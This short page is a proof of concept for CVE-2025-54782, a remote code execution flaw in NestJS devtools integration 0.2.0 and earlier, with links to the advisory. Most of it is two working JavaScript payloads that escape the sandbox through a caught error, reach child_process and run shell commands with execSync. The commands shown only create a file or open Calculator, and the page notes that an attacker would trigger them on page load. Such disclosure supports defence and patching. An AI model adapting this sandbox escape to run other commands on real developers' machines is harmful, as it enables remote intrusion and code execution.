This is a proof of concept for the CVE-2025-54782 RCE vulnerability in NestJS Inspector.
Read more: https://socket.dev/blog/nestjs-rce-vuln
Read more: https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
These payloads will run if the @nestjs/devtools-integration 0.2.0 or lower is installed and running.
Note: An attacker would just run these payloads automatically on page load. Having to click a button is just for demonstration purposes.
This will log "hello" to the console. This does not require bypassing the sandbox.
This will execute the touch command in the project's root directory. This payload requires bypassing the sandbox.
This is the payload being executed:
(function() {
try{
propertyIsEnumerable.call();
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag.txt');
}
})()
This will open the calculator app on a Mac.
This payload requires bypassing the sandbox.
This is the payload being executed:
(function() {
try{
propertyIsEnumerable.call();
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app');
}
})()